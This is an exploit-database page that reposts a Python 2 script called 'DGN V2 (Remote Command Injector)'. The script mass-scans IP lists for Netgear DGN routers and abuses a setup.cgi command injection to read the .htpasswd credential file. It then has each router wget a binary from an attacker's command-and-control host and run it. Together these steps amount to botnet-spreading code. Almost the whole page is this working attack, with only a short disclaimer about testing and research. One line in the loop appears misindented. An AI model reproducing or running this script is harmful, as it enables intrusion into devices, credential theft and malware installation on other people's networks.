Advertisement






DGN V2 (Remote Command Injector)

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX $1000 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-23
CPE
cpe:cpe:/a:dgn:v2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.802128 0.981104

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070115

Below is a copy:

DGN V2 (Remote Command Injector)
# Made By Retried
# Instagram: @retried

# nano /usr/include/bits/typesizes.h -> change 1024 to 99999
# ulimit -n 1000000

import threading, random, socket, time, sys, urllib2

blacklisted = ["127.0","10.0","192.168"]
ports = [5000, 80, 8080, 8000, 8888, 8443]

if len(sys.argv) < 2:
    sys.exit("Usage: python " + sys.argv[0] + " <ip-list> <cnc-ip>")
print "Check out @retried on instagram for more shit..."

server_ip = sys.argv[2]

def infect(ip):
    global ports
    global blacklisted
    try:
        thisipisbad='no'
        for badip in blacklisted:
            if badip in ip:
                thisipisbad='yes'
        if thisipisbad=='yes':
            sys.exit()
        for port in ports:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(3)
                s.connect((ip, port))
                s.close()
                ppport = port
            except:
                pass
        
        dobreak=False
        if ppport != 8080:
            rs = urllib2.urlopen("http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1")
        else:
            rs = urllib2.urlopen("http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1")
        time.sleep(1)
        
        if "admin:" in rs.read():
            badserver=False
        else:
            sys.exit()
        badserver=False
        if badserver == False:
                print "Retried is Infecting " + ip
                if ppport != 8080:
                    url = "http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1"
                else:
                    url = "http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1"
                rs = urllib2.urlopen(url, timeout=5)
                time.sleep(1)
    except Exception as e:
        pass

vulns = open(sys.argv[1], "r").readlines()
x = 0

for line in vulns:
    try:

        line = line.replace("\n", "")
        if x > 50:
            time.sleep(1)
            x = 0
       
        t = threading.Thread(target=infect, args=(line,))
        t.start()
        
x += 1
    except Exception as e:
        pass

print "Done"

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum